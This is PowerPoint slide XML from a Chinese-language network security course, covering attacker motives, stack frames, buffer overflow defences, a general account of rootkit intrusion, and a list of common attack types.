            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19591973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DEDEE5-2910-4A32-95A8-2E91F5EE0957}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>247</a:t>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7273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AA0ECE-9260-4928-85D7-F2B53552C3F5}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183298" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183299" name="Rectangle 1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>黑客：追求技术上的挑战和满足</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>间谍：刺探政治情报</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恐怖主义者：制造恐怖事件达到政治目的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>公司雇佣者：竞争经济利益</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>职业犯罪：谋求个人经济利益</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>破坏者：实现破坏</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>窥探者：窥探隐私</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>无聊者：满足好奇</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134245483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栈帧也叫过程活动记录，是编译器用来实现过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>函数调用的一种数据结构。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从逻辑上讲，栈帧就是一个函数执行的环境：函数参数、函数的局部变量、函数执行完后返回到哪里等等。</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248</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25436970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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）关闭不需要的特权程序。</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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）及时给系统和服务程序漏洞打补丁。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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）强制写正确的代码。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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）通过操作系统使得缓冲区不可执行，从而阻止攻击者植入攻击代码。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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）利用编译器的边界检查来实现缓冲区的保护，这个方法使得缓冲区溢出不可能出现，从而完全消除了缓冲区溢出的威胁，但是代价比较大。</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6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）在程序指针失效前进行完整性检查。</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7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）改进系统内部安全机制。</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249</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2134720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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）关闭不需要的特权程序。</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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）及时给系统和服务程序漏洞打补丁。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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）强制写正确的代码。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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）通过操作系统使得缓冲区不可执行，从而阻止攻击者植入攻击代码。</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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）利用编译器的边界检查来实现缓冲区的保护，这个方法使得缓冲区溢出不可能出现，从而完全消除了缓冲区溢出的威胁，但是代价比较大。</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6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）在程序指针失效前进行完整性检查。</a:t>
            </a:r>
          </a:p>
          <a:p>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7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）改进系统内部安全机制。</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250</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2134720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5D752A5-E0AF-4B90-8252-D219B0319A75}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>251</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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4095235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48E8D23-6BEC-40ED-BFDA-E80C44FF3A4B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>252</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>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a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37540806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endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112644" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5652D7EB-781C-4D12-BC31-D7AFD72DD4DC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>253</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40358869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攻击者通过远程攻击获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>访问权限，或者首先密码猜测或者密码强制破译的方式获得系统的访问权限。进入系统后，如果他还没有获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>权限，再通过某些安全漏洞获得系统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>权限。接着，攻击者会在侵入的主机中安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，然后他将经常通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的后门检查系统是否有其他的用户登录，如果只有自己，攻击者就开始着手清理日志中的有关信息。通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的嗅探器获得其它系统的用户和密码之后，攻击者就会利用这些信息侵入其它的系统。</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254</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22364637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CFB8A69-4D75-4737-A248-69970563886D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>255</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>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a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25871836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586EE449-10BC-4C95-9A4B-2B341D3592B6}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>260</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>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21014193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328FC-D9A5-4EE0-97B3-42E2457E0C5E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>261</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414722"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4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4117735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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>欺骗攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>(Spoofing) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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zh-CN" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中间人攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>(Man-in-the-Middle Attacks)</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>拒绝服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>(Denial of Service)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击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缓冲区溢出（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Buffer Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）攻击</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a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>后门和漏洞攻击</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a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>暴力破解攻击</a:t>
            </a:r>
          </a:p>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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26879669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29FB7-1E15-4852-97AF-312C7FEF727F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>262</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416770"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6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8808212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E7F70-1CE2-407F-803E-7AF508D19FB0}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>263</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418818"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8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7556668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F52C4-9223-4230-BD9D-525A978CD42D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>264</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420866"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20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7874191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FAC3EA-D520-4DDC-882F-ACF49CA4312E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>266</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1720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3355531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沙</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4-1(9-26)</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268</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22736362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6DFDFF0D-C498-45FB-BCCA-B0E10B2E2903}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>270</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>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Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15371020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0D18BC3A-11C8-40E6-A23C-B0AE74F20C92}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>271</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>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Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="262584931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3ABA0CFA-AD09-4B71-8544-DDF4A5E00D85}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>272</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>一个最常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>协议就是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ping，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>它利用了</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
